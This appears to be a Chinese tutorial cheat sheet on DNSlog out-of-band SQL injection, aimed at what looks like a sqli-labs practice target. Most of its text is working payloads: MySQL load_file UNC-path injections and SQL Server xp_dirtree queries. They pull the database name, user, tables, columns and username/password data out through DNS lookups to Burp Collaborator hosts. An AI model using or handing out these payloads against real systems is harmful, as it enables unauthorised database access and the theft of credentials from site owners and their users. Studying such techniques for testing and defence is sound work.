oxo1 前言
众所周知盲注查询数据贼慢,利用 dnslog 就可以快速解决这个问题,但是利用条件也挺鸡肋的。具体原理请谷歌
1、secure_file_priv 不能为 NULL
2、支持 Windows,不支持 Linux
oxo2 工具
http://ceye.io/
http://www.dnslog.cn/
BurpSuite:点击 Burp ,再点击 Burp Collaborator client
https://github.com/ADOOO/DnslogSqlinj
oxo3 MySQL
1、获取当前数据库
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',(database()),'.8enqwp3jaapnlvk6adhsaym9q0wqkf.burpcollaborator.net\\abc'))--+
2、获取当前数据库用户名
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',hex(user()),'.x97frey85zkcgkfv52ch5nhylprgf5.burpcollaborator.net\\abc'))--+
因为有特殊符号需要编码来传输,上面的是 hex ,解码得到 root@localhost
3、获取表名
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'.7v3pdokir96m2u15rcyrrx387zdr1g.burpcollaborator.net\\abc'))--+
4、获取列名
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.ne55w43yapp2laklash7admoqfw8kx.burpcollaborator.net\\abc'))--+
5、获取数据
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',(select hex(concat(username,0x7e,password)) from security.users limit 0,1),'.ne55w43yapp2laklash7admoqfw8kx.burpcollaborator.net\\abc'))--+
oxo4 SQL Server
1、获取库名
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),DB_NAME())+'.p0qgrjkjvnnqxa7krdxd60peg5mvak.burpcollaborator.net';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
2、获取表名
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 name from sysobjects where xtype='u'))+'.p0qgrjkjvnnqxa7krdxd60peg5mvak.burpcollaborator.net';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
3、获取列名
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name!='id'))+'.p0qgrjkjvnnqxa7krdxd60peg5mvak.burpcollaborator.net';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
4、获取数据
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 username from users))+'.xuv0qxkeb8f32x8ko2gfihaeo5uvik.burpcollaborator.net';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
oxo5 参考
http://ceye.io/payloads
https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI/blob/master/%E4%B8%80%E7%AF%87%E4%BA%86%E8%A7%A3MSSQL.md